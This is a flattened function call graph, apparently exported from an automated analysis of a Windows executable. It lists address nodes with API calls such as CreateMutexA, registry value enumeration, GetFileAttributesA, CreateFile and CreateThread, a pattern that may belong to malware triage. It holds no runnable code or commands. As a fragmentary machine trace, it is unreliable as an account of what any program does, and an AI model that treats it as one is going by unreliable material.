37573 63690a 37568->37573 37571 6388bf 37571->37572 37581 636d52 GetPEB GetPEB RtlAllocateHeap __fassign __wsopen_s 37571->37581 37572->37508 37574 63692a 37573->37574 37575 636921 37573->37575 37574->37575 37582 63a671 GetPEB GetPEB __dosmaperr __freea __purecall 37574->37582 37575->37571 37577 63694a 37583 63b5fb GetPEB GetPEB __cftof 37577->37583 37579 636960 37584 63b628 GetPEB GetPEB __cftof 37579->37584 37581->37571 37582->37577 37583->37579 37584->37575 37597 61d762 37607 61d76e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 37597->37607 37598 61d8ce ___scrt_fastfail 37633 636629 GetPEB GetPEB __purecall 37598->37633 37600 61d8db 37634 6365ed GetPEB GetPEB __purecall 37600->37634 37602 61d8e3 ___security_init_cookie 37604 61d8e9 __scrt_common_main_seh 37602->37604 37603 61d7be 37605 61d83f 37616 6395bc 37605->37616 37607->37598 37607->37603 37607->37605 37632 636603 2 API calls 4 library calls 37607->37632 37609 61d845 37620 616d30 37609->37620 37617 6395c5 37616->37617 37619 6395ca 37616->37619 37635 639320 37617->37635 37619->37609 37659 60a960 Sleep CreateMutexA 37620->37659 37624 616d45 37625 60d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37624->37625 37626 616d4a 37625->37626 37627 614fc0 6 API calls 37626->37627 37628 616d4f 37627->37628 37629 606020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37628->37629 37630 616d54 37629->37630 37631 606020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 37630->37631 37631->37630 37632->37605 37633->37600 37634->37602 37636 639329 37635->37636 37638 639336 37635->37638 37636->37638 37639 63934c 37636->37639 37638->37619 37640 639355 37639->37640 37641 639358 37639->37641 37640->37638 37646 63e669 37641->37646 37645 639364 __freea 37645->37638 37647 63e672 37646->37647 37648 63935f 37646->37648 37656 63a72e GetPEB GetPEB __dosmaperr __freea __purecall 37647->37656 37652 63ea0a 37648->37652 37650 63e695 37657 63e4b0 3 API calls 4 library calls 37650->37657 37653 63ea18 __cftof 37652->37653 37654 63ea4a __cftof __freea 37653->37654 37658 63b04b RtlAllocateHeap ListArray __dosmaperr 37653->37658 37654->37645 37656->37650 37657->37648 37658->37654 37661 60a98e 37659->37661 37660 60a9a7 37664 60ce40 37660->37664 37661->37660 37669 636629 GetPEB GetPEB __purecall 37661->37669 37663 60a9b0 37665 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37664->37665 37666 60ce92 37665->37666 37667 605c10 4 API calls 37666->37667 37668 60ce9d 37667->37668 37669->37663 37694 609ba5 GetFileAttributesA 37697 609bb5 Hash 37694->37697 37695 609c80 Hash 37699 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37695->37699 37696 60a91c Concurrency::details::_CancellationTokenState::_RegisterCallback 37698 60a960 Sleep CreateMutexA 37696->37698 37697->37695 37697->37696 37702 60a98e 37698->37702 37700 60a903 37699->37700 37701 60a9a7 37702->37701 37705 636629 GetPEB GetPEB __purecall 37702->37705 37704 60a9b0 37705->37704 37706 63c1c4 37707 63c1ee 37706->37707 37709 63c259 __dosmaperr ___std_exception_copy __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37706->37709 37707->37709 37710 64292b 37707->37710 37711 642937 ___scrt_is_nonwritable_in_current_image __purecall 37710->37711 37713 64295c 37711->37713 37714 64284d 37711->37714 37713->37709 37716 642899 37714->37716 37715 6428a0 __freea 37717 642910 37715->37717 37719 642907 37715->37719 37716->37715 37762 63b04b RtlAllocateHeap ListArray __dosmaperr 37716->37762 37720 64290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37717->37720 37747 6426f2 37717->37747 37723 642517 37719->37723 37720->37713 37724 642526 __freea 37723->37724 37725 6426c8 37724->37725 37727 642680 ___std_exception_copy 37724->37727 37763 63b04b RtlAllocateHeap ListArray __dosmaperr 37724->37763 37725->37720 37727->37725 37728 642744 __freea 37727->37728 37729 642842 ___std_exception_copy 37727->37729 37732 64274f GetTimeZoneInformation 37728->37732 37740 6428a0 __freea 37729->37740 37768 63b04b RtlAllocateHeap ListArray __dosmaperr 37729->37768 37730 642910 37734 6426f2 4 API calls 37730->37734 37737 64290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37730->37737 37736 64276b 37732->37736 37739 6427be __cftof 37732->37739 37733 642907 37735 642517 4 API calls 37733->37735 37734->37737 37735->37737 37767 63ef17 GetPEB GetPEB __cftof _unexpected 37736->37767 37737->37720 37739->37720 37740->37730 37740->37733 37741 6425b6 __freea ___std_exception_copy 37741->37725 37741->37727 37764 638bbe GetPEB GetPEB RtlAllocateHeap 37741->37764 37743 64262a 37743->37727 37765 638bbe GetPEB GetPEB RtlAllocateHeap 37743->37765 37745 642651 37745->37727 37766 638bbe GetPEB GetPEB RtlAllocateHeap 37745->37766 37748 642701 37747->37748 37749 642744 __freea 37748->37749 37750 642842 ___std_exception_copy 37748->37750 37753 64274f GetTimeZoneInformation 37749->37753 37760 6428a0 __freea 37750->37760 37770 63b04b RtlAllocateHeap ListArray __dosmaperr 37750->37770 37751 642910 37755 6426f2 4 API calls 37751->37755 37758 64290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37751->37758 37757 64276b 37753->37757 37761 6427be __cftof 37753->37761 37754 642907 37756 642517 4 API calls 37754->37756 37755->37758 37756->37758 37769 63ef17 GetPEB GetPEB __cftof _unexpected 37757->37769 37758->37720 37760->37751 37760->37754 37761->37720 37762->37715 37763->37741 37764->37743 37765->37745 37766->37727 37767->37739 37768->37740 37769->37761 37770->37760 37783 60e62d 37784 60e63b Hash 37783->37784 37785 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37784->37785 37811 60e83e Concurrency::details::_CancellationTokenState::_RegisterCallback 37784->37811 37787 60e7cb 37785->37787 37786 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37788 60eb19 37786->37788 37789 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37787->37789 37790 605c10 4 API calls 37788->37790 37791 60e7e0 37789->37791 37792 60eb21 37790->37792 37794 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37791->37794 37906 6183c0 37792->37906 37796 60e7f2 37794->37796 37795 60eb36 37914 618220 37795->37914 37798 60be30 10 API calls 37796->37798 37800 60e7fe 37798->37800 37799 60eb45 GetFileAttributesA 37807 60eb62 37799->37807 37802 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37800->37802 37803 60e813 37802->37803 37804 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37803->37804 37805 60e82b 37804->37805 37806 605c10 4 API calls 37805->37806 37808 60e832 37806->37808 37810 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37807->37810 37809 608580 RtlAllocateHeap 37808->37809 37809->37811 37812 60ed60 37810->37812 37811->37786 37819 60ea8f Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37811->37819 37813 605c10 4 API calls 37812->37813 37814 60ed68 37813->37814 37815 6183c0 RtlAllocateHeap 37814->37815 37816 60ed7d 37815->37816 37817 618220 RtlAllocateHeap 37816->37817 37818 60ed8c GetFileAttributesA 37817->37818 37823 60eda9 37818->37823 37821 60f699 Hash 37822 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37822->37823 37823->37821 37823->37822 37824 60f6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 37823->37824 37825 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37824->37825 37826 60f727 37825->37826 37827 605c10 4 API calls 37826->37827 37828 60f72e 37827->37828 37829 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37828->37829 37830 60f741 37829->37830 37831 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37830->37831 37832 60f756 37831->37832 37833 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37832->37833 37834 60f76b 37833->37834 37835 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37834->37835 37836 60f77d 37835->37836 37922 60e530 37836->37922 37838 60f786 37839 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37838->37839 37840 60f7aa 37839->37840 37841 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37840->37841 37842 60f7ba 37841->37842 37843 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37842->37843 37844 60f7d7 37843->37844 37845 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37844->37845 37846 60f7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37845->37846 37847 60f982 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37846->37847 37848 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37846->37848 37849 60fa04 37848->37849 37850 605c10 4 API calls 37849->37850 37851 60fa0b 37850->37851 37852 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37851->37852 37853 60fa1e 37852->37853 37854 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37853->37854 37855 60fa33 37854->37855 37856 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37855->37856 37857 60fa48 37856->37857 37858 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37857->37858 37859 60fa5a 37858->37859 37860 60e530 12 API calls 37859->37860 37862 60fa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 37860->37862 37861 60fb35 Hash 37862->37861 37863 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37862->37863 37864 60fba5 37863->37864 38060 609580 4 API calls 3 library calls 37864->38060 37866 60fbb4 38061 609230 4 API calls 3 library calls 37866->38061 37868 60fbc3 38062 618320 37868->38062 37870 60fbdb 37870->37870 37871 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37870->37871 37872 60fc8c 37871->37872 37873 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37872->37873 37874 60fca7 37873->37874 37875 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37874->37875 37876 60fcb9 37875->37876 37877 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37876->37877 37878 6105d4 37877->37878 37879 605c10 4 API calls 37878->37879 37880 6105db 37879->37880 37881 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37880->37881 37882 6105f1 37881->37882 37883 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37882->37883 37884 610609 37883->37884 37885 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37884->37885 37886 610621 37885->37886 37887 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37886->37887 37888 610633 37887->37888 37889 60e530 12 API calls 37888->37889 37891 61063c Concurrency::details::_CancellationTokenState::_RegisterCallback 37889->37891 37890 610880 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37891->37890 37892 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37891->37892 37893 610987 37892->37893 37894 605c10 4 API calls 37893->37894 37895 61098e 37894->37895 37896 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37895->37896 37897 6109a4 37896->37897 37898 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37897->37898 37899 6109bc 37898->37899 37900 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37899->37900 37901 6109d4 37900->37901 37902 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37901->37902 37903 6112e0 37902->37903 37904 60e530 12 API calls 37903->37904 37905 6112e9 37904->37905 38066 617760 37906->38066 37908 618439 37910 618454 __InternalCxxFrameHandler 37908->37910 38078 618f40 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37908->38078 37913 6184a8 __InternalCxxFrameHandler 37910->37913 38079 618f40 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37910->38079 37912 6184ee 37912->37795 37913->37795 37915 618292 37914->37915 37916 618248 37914->37916 37921 6182a1 __InternalCxxFrameHandler 37915->37921 38082 618f40 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37915->38082 37916->37915 37917 618251 37916->37917 37918 619280 RtlAllocateHeap 37917->37918 37919 61825a 37918->37919 37919->37799 37921->37799 37923 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37922->37923 37924 60e576 37923->37924 37925 605c10 4 API calls 37924->37925 37926 60e581 37925->37926 37927 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37926->37927 37928 60e59c 37927->37928 37929 605c10 4 API calls 37928->37929 37930 60e5a7 37929->37930 37931 619280 RtlAllocateHeap 37930->37931 37932 60e5ba 37931->37932 37933 618320 RtlAllocateHeap 37932->37933 37934 60e5fc 37933->37934 37935 618220 RtlAllocateHeap 37934->37935 37936 60e60d 37935->37936 37937 618320 RtlAllocateHeap 37936->37937 37938 60e61e 37937->37938 37939 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37938->37939 37940 60e7cb 37939->37940 37941 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37940->37941 37942 60e7e0 37941->37942 37943 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37942->37943 37944 60e7f2 37943->37944 37945 60be30 10 API calls 37944->37945 37946 60e7fe 37945->37946 37947 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37946->37947 37948 60e813 37947->37948 37949 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37948->37949 37950 60e82b 37949->37950 37951 605c10 4 API calls 37950->37951 37952 60e832 37951->37952 37953 608580 RtlAllocateHeap 37952->37953 37955 60e83e Concurrency::details::_CancellationTokenState::_RegisterCallback 37953->37955 37954 60ea8f Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37954->37838 37955->37954 37956 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37955->37956 37957 60eb19 37956->37957 37958 605c10 4 API calls 37957->37958 37959 60eb21 37958->37959 37960 6183c0 RtlAllocateHeap 37959->37960 37961 60eb36 37960->37961 37962 618220 RtlAllocateHeap 37961->37962 37963 60eb45 GetFileAttributesA 37962->37963 37965 60eb62 37963->37965 37966 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37965->37966 37967 60ed60 37966->37967 37968 605c10 4 API calls 37967->37968 37969 60ed68 37968->37969 37970 6183c0 RtlAllocateHeap 37969->37970 37971 60ed7d 37970->37971 37972 618220 RtlAllocateHeap 37971->37972 37973 60ed8c GetFileAttributesA 37972->37973 37977 60eda9 37973->37977 37975 60f699 Hash 37975->37838 37976 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37976->37977 37977->37975 37977->37976 37978 60f6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 37977->37978 37979 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37978->37979 37980 60f727 37979->37980 37981 605c10 4 API calls 37980->37981 37982 60f72e 37981->37982 37983 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37982->37983 37984 60f741 37983->37984 37985 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37984->37985 37986 60f756 37985->37986 37987 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37986->37987 37988 60f76b 37987->37988 37989 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37988->37989 37990 60f77d 37989->37990 37991 60e530 10 API calls 37990->37991 37992 60f786 37991->37992 37993 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37992->37993 37994 60f7aa 37993->37994 37995 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37994->37995 37996 60f7ba 37995->37996 37997 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37996->37997 37998 60f7d7 37997->37998 37999 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37998->37999 38001 60f7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 37999->38001 38000 60f982 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38000->37838 38001->38000 38002 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38001->38002 38003 60fa04 38002->38003 38004 605c10 4 API calls 38003->38004 38005 60fa0b 38004->38005 38006 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38005->38006 38007 60fa1e 38006->38007 38008 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38007->38008 38009 60fa33 38008->38009 38010 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38009->38010 38011 60fa48 38010->38011 38012 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38011->38012 38013 60fa5a 38012->38013 38014 60e530 10 API calls 38013->38014 38016 60fa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 38014->38016 38015 60fb35 Hash 38015->37838 38016->38015 38017 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38016->38017 38018 60fba5 38017->38018 38083 609580 4 API calls 3 library calls 38018->38083 38020 60fbb4 38084 609230 4 API calls 3 library calls 38020->38084 38022 60fbc3 38023 618320 RtlAllocateHeap 38022->38023 38024 60fbdb 38023->38024 38024->38024 38025 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38024->38025 38026 60fc8c 38025->38026 38027 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38026->38027 38028 60fca7 38027->38028 38029 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38028->38029 38030 60fcb9 38029->38030 38031 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38030->38031 38032 6105d4 38031->38032 38033 605c10 4 API calls 38032->38033 38034 6105db 38033->38034 38035 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38034->38035 38036 6105f1 38035->38036 38037 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38036->38037 38038 610609 38037->38038 38039 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38038->38039 38040 610621 38039->38040 38041 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38040->38041 38042 610633 38041->38042 38043 60e530 10 API calls 38042->38043 38045 61063c Concurrency::details::_CancellationTokenState::_RegisterCallback 38043->38045 38044 610880 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38044->37838 38045->38044 38046 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38045->38046 38047 610987 38046->38047 38048 605c10 4 API calls 38047->38048 38049 61098e 38048->38049 38050 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38049->38050 38051 6109a4 38050->38051 38052 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38051->38052 38053 6109bc 38052->38053 38054 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38053->38054 38055 6109d4 38054->38055 38056 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38055->38056 38057 6112e0 38056->38057 38058 60e530 10 API calls 38057->38058 38059 6112e9 38058->38059 38060->37866 38061->37868 38063 618339 38062->38063 38064 61834d __InternalCxxFrameHandler 38063->38064 38085 618f40 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 38063->38085 38064->37870 38067 61777b 38066->38067 38077 617864 Hash std::_Rethrow_future_exception 38066->38077 38071 617811 38067->38071 38072 6177ea 38067->38072 38076 6177fb Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 38067->38076 38067->38077 38069 6178f6 38081 602480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 38069->38081 38075 61d3e2 ListArray RtlAllocateHeap 38071->38075 38071->38076 38072->38069 38074 61d3e2 ListArray RtlAllocateHeap 38072->38074 38073 6178fb 38074->38076 38075->38076 38076->38077 38080 619270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 38076->38080 38077->37908 38078->37910 38079->37912 38081->38073 38082->37921 38083->38020 38084->38022 38085->38064 38086 60eb4e 38087 60eb50 GetFileAttributesA 38086->38087 38088 60eb62 38087->38088 38089 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38088->38089 38090 60ed60 38089->38090 38091 605c10 4 API calls 38090->38091 38092 60ed68 38091->38092 38093 6183c0 RtlAllocateHeap 38092->38093 38094 60ed7d 38093->38094 38095 618220 RtlAllocateHeap 38094->38095 38096 60ed8c GetFileAttributesA 38095->38096 38100 60eda9 38096->38100 38098 60f699 Hash 38099 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38099->38100 38100->38098 38100->38099 38101 60f6cb Concurrency::details::_CancellationTokenState::_RegisterCallback 38100->38101 38102 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38101->38102 38103 60f727 38102->38103 38104 605c10 4 API calls 38103->38104 38105 60f72e 38104->38105 38106 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38105->38106 38107 60f741 38106->38107 38108 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38107->38108 38109 60f756 38108->38109 38110 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38109->38110 38111 60f76b 38110->38111 38112 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38111->38112 38113 60f77d 38112->38113 38114 60e530 12 API calls 38113->38114 38115 60f786 38114->38115 38116 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38115->38116 38117 60f7aa 38116->38117 38118 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38117->38118 38119 60f7ba 38118->38119 38120 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38119->38120 38121 60f7d7 38120->38121 38122 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38121->38122 38124 60f7f0 Concurrency::details::_CancellationTokenState::_RegisterCallback 38122->38124 38123 60f982 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38124->38123 38125 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38124->38125 38126 60fa04 38125->38126 38127 605c10 4 API calls 38126->38127 38128 60fa0b 38127->38128 38129 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38128->38129 38130 60fa1e 38129->38130 38131 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38130->38131 38132 60fa33 38131->38132 38133 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38132->38133 38134 60fa48 38133->38134 38135 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38134->38135 38136 60fa5a 38135->38136 38137 60e530 12 API calls 38136->38137 38139 60fa63 Concurrency::details::_CancellationTokenState::_RegisterCallback 38137->38139 38138 60fb35 Hash 38139->38138 38140 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38139->38140 38141 60fba5 38140->38141 38183 609580 4 API calls 3 library calls 38141->38183 38143 60fbb4 38184 609230 4 API calls 3 library calls 38143->38184 38145 60fbc3 38146 618320 RtlAllocateHeap 38145->38146 38147 60fbdb 38146->38147 38147->38147 38148 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38147->38148 38149 60fc8c 38148->38149 38150 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38149->38150 38151 60fca7 38150->38151 38152 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38151->38152 38153 60fcb9 38152->38153 38154 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38153->38154 38155 6105d4 38154->38155 38156 605c10 4 API calls 38155->38156 38157 6105db 38156->38157 38158 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38157->38158 38159 6105f1 38158->38159 38160 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38159->38160 38161 610609 38160->38161 38162 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38161->38162 38163 610621 38162->38163 38164 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38163->38164 38165 610633 38164->38165 38166 60e530 12 API calls 38165->38166 38168 61063c Concurrency::details::_CancellationTokenState::_RegisterCallback 38166->38168 38167 610880 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38168->38167 38169 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38168->38169 38170 610987 38169->38170 38171 605c10 4 API calls 38170->38171 38172 61098e 38171->38172 38173 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38172->38173 38174 6109a4 38173->38174 38175 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38174->38175 38176 6109bc 38175->38176 38177 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38176->38177 38178 6109d4 38177->38178 38179 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38178->38179 38180 6112e0 38179->38180 38181 60e530 12 API calls 38180->38181 38182 6112e9 38181->38182 38183->38143 38184->38145 38197 63ac53 38202 63aa29 38197->38202 38199 63ac69 38200 63ac92 38199->38200 38210 641a9c 38199->38210 38203 63aa48 38202->38203 38203->38203 38208 63aa5b __dosmaperr ___std_exception_copy 38203->38208 38213 64132b GetPEB GetPEB __dosmaperr ___std_exception_copy 38203->38213 38205 63abe0 38205->38208 38214 64132b GetPEB GetPEB __dosmaperr ___std_exception_copy 38205->38214 38207 63abfe 38207->38208 38215 64132b GetPEB GetPEB __dosmaperr ___std_exception_copy 38207->38215 38208->38199 38216 641461 38210->38216 38212 641ab7 38212->38200 38213->38205 38214->38207 38215->38208 38217 64146d ___scrt_is_nonwritable_in_current_image 38216->38217 38219 641474 __dosmaperr ___std_exception_copy __wsopen_s 38217->38219 38220 641a2e 38217->38220 38219->38212 38227 63698d 38220->38227 38222 641a50 38230 6368ed 38222->38230 38226 641a64 __freea 38226->38219 38228 63690a __cftof 2 API calls 38227->38228 38229 63699f __wsopen_s 38228->38229 38229->38222 38247 63683b 38230->38247 38232 636905 38232->38226 38233 641abc 38232->38233 38234 641ad9 __wsopen_s 38233->38234 38241 641aee __dosmaperr __wsopen_s 38234->38241 38256 641775 CreateFileW 38234->38256 38236 641be2 GetFileType 38240 641c34 __wsopen_s 38236->38240 38236->38241 38237 641b65 38237->38236 38237->38241 38257 641775 CreateFileW 38237->38257 38239 641baa 38239->38236 38239->38241 38242 641ca1 38240->38242 38258 641984 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 38240->38258 38241->38226 38242->38241 38259 641522 3 API calls 3 library calls 38242->38259 38245 641cd6 38245->38241 38260 641775 CreateFileW 38245->38260 38248 636863 38247->38248 38249 636849 __dosmaperr __fassign __wsopen_s 38247->38249 38250 63686a 38248->38250 38251 636889 __fassign 38248->38251 38249->38232 38250->38249 38254 6369e6 RtlAllocateHeap __wsopen_s 38250->38254 38251->38249 38255 6369e6 RtlAllocateHeap __wsopen_s 38251->38255 38254->38249 38255->38249 38256->38237 38257->38239 38258->38242 38259->38245 38260->38241 38261 607590 Sleep 38262 60765e 38261->38262 38263 6075e3 38261->38263 38265 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38262->38265 38276 61d111 SleepConditionVariableCS 38263->38276 38267 60767a 38265->38267 38266 6075ed 38266->38262 38277 61d64e RtlAllocateHeap 38266->38277 38268 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38267->38268 38269 607693 38268->38269 38271 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38269->38271 38273 6076ac CreateThread Sleep 38271->38273 38272 607654 38278 61d0c7 RtlWakeAllConditionVariable 38272->38278 38275 6076d9 